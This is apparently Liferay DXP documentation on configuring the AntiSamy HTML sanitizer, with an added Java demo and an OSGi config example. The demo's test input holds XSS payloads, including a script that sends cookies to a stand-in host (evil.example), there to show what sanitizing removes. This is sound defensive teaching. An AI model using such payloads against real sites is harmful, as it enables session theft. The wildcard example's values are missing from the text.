The AntiSamy module adds an OWASP AntiSamy implementation to your portal's list of sanitizer implementations. It uses the OWASP AntiSamy library to enforce a content policy that has proven effective for the auction site eBay. Liferay DXP runs the AntiSamy sanitizer, together with any other sanitizers you have configured, over user input to blog entries, calendar events, message boards posts, wiki pages, and web content articles before that content is stored and shown to other users.
AntiSamy is enabled by default.
AntiSamy is configured with both a blacklist and a whitelist of content types, so you can define which kinds of content are sanitized and which are not. A content type on the whitelist is stored as the user submitted it, without filtering; a content type on the blacklist is filtered.
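To show what the sanitizer actually does to a blacklisted content type, here is an added example that calls the OWASP AntiSamy library directly on constructed user input; it is not Liferay's code and does not go through the portal's sanitizer framework. It assumes the sample policy file antisamy-ebay.xml from the AntiSamy project is on the classpath (any AntiSamy policy file can be substituted); the class name AntiSamyDemo and the sample markup are inventions for the example.

```java
import java.io.InputStream;

import org.owasp.validator.html.AntiSamy;
import org.owasp.validator.html.CleanResults;
import org.owasp.validator.html.Policy;

/**
 * Added example, not Liferay's code: runs OWASP AntiSamy on constructed
 * input to show the effect of sanitizing a message boards post or blog entry.
 *
 * Assumption: antisamy-ebay.xml (shipped with the AntiSamy project) is on the
 * classpath. Any other AntiSamy policy file works the same way.
 */
public class AntiSamyDemo {

    // Constructed input: markup an untrusted user might post. It mixes
    // harmless formatting with an event handler, a script element and a
    // javascript: URL, all of which a sanitizer must remove.
    static final String DIRTY =
        "<p onmouseover=\"alert(1)\">Hello</p>"
        + "<script>document.location='http://evil.example/?c='+document.cookie</script>"
        + "<a href=\"javascript:alert(1)\">click</a>"
        + "<b>bold is fine</b>";

    /** Loads the named policy from the classpath and scans the HTML with it. */
    public static CleanResults sanitize(String html, String policyResource)
        throws Exception {

        try (InputStream in = AntiSamyDemo.class.getResourceAsStream(policyResource)) {
            if (in == null) {
                throw new IllegalStateException(
                    "policy not on classpath: " + policyResource);
            }
            Policy policy = Policy.getInstance(in);
            return new AntiSamy().scan(html, policy);
        }
    }

    public static void main(String[] args) throws Exception {
        CleanResults results = sanitize(DIRTY, "/antisamy-ebay.xml");

        // The clean HTML keeps the allowed formatting (<p>, <b>) and drops the
        // script, the onmouseover handler and the javascript: href. The exact
        // output text depends on the policy in use.
        System.out.println("clean HTML: " + results.getCleanHTML());

        // Each removed element or attribute is reported as a policy violation,
        // which is useful when tuning a policy for your own content.
        System.out.println("violations: " + results.getNumberOfErrors());
        for (String message : results.getErrorMessages()) {
            System.out.println("  - " + message);
        }
    }
}
```

Compile it with the AntiSamy jar (and its dependencies) on the classpath and run AntiSamyDemo. Whitelisting a content type in the portal means this scan is skipped entirely for it, so the input above would be stored and rendered unchanged.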
By default, everything is sanitized except FragmentEntry. The assumption is that the users creating page fragments are trusted, while users posting message boards or wiki articles may not be. If this is not the configuration you want, change it as follows:
Navigate to Control Panel → System Settings → Security Tools → AntiSamy Sanitizer.
Enter a package path you want to sanitize into the Blacklist field.
Use the plus (+) button to add further Blacklist fields if you need them.
Enter a package path you don't want sanitized into a Whitelist field.
Use the plus (+) button to add further Whitelist fields if you need them.
If you want to remove a package path from the configuration, click the trash can icon.
When finished, click Save.
You can use wildcards in the configuration. For example, if you only want to sanitize message board posts and nothing else, you can
Configure the whitelist to
Configure the blacklist to
The whitelist and the blacklist work together: a content type that matches the blacklist is sanitized even though a wildcard whitelist would otherwise match it too. Without the blacklist, the whitelist in the configuration above would have to list every content type except com.liferay.message.boards, which would be a daunting task to configure.
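The same settings entered through System Settings can be deployed as an OSGi configuration file, which is how you keep them in version control and apply them consistently across environments. The file below is an added example, not part of this page or of Liferay's own documentation. It assumes that the configuration PID is com.liferay.portal.security.antisamy.configuration.AntiSamySanitizerConfiguration, that the two settings are stored under the keys blacklist and whitelist, and that the wildcard spelling is a trailing .* (or a bare *); check the exported .config from your own System Settings page for the exact PID and keys before relying on it.

```properties
# Added example, not Liferay's own documentation. Assumed file name
# (the PID plus ".config"), placed in [Liferay Home]/osgi/configs/:
#   com.liferay.portal.security.antisamy.configuration.AntiSamySanitizerConfiguration.config
#
# Goal from the text above: sanitize only message boards content and nothing else.
# The whitelist matches every content type; the blacklist overrides it for
# message boards. Both wildcard spellings are assumptions for this example.
whitelist=["*"]
blacklist=["com.liferay.message.boards.*"]

# Default-like alternative (commented out): sanitize everything except page
# fragments. With an empty blacklist, only whitelisted types escape sanitizing,
# so this is the safer starting point when you are unsure who posts what.
#whitelist=["com.liferay.fragment.model.FragmentEntry"]
#blacklist=[]
```

After deploying the file, confirm the change took effect by opening Control Panel → System Settings → Security Tools → AntiSamy Sanitizer and checking that the fields show the values from the file rather than the defaults.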
Use AntiSamy to ensure user-generated content stays safe for other users to view. Remember that a whitelisted content type is stored exactly as submitted, so whitelist only content types that trusted users create.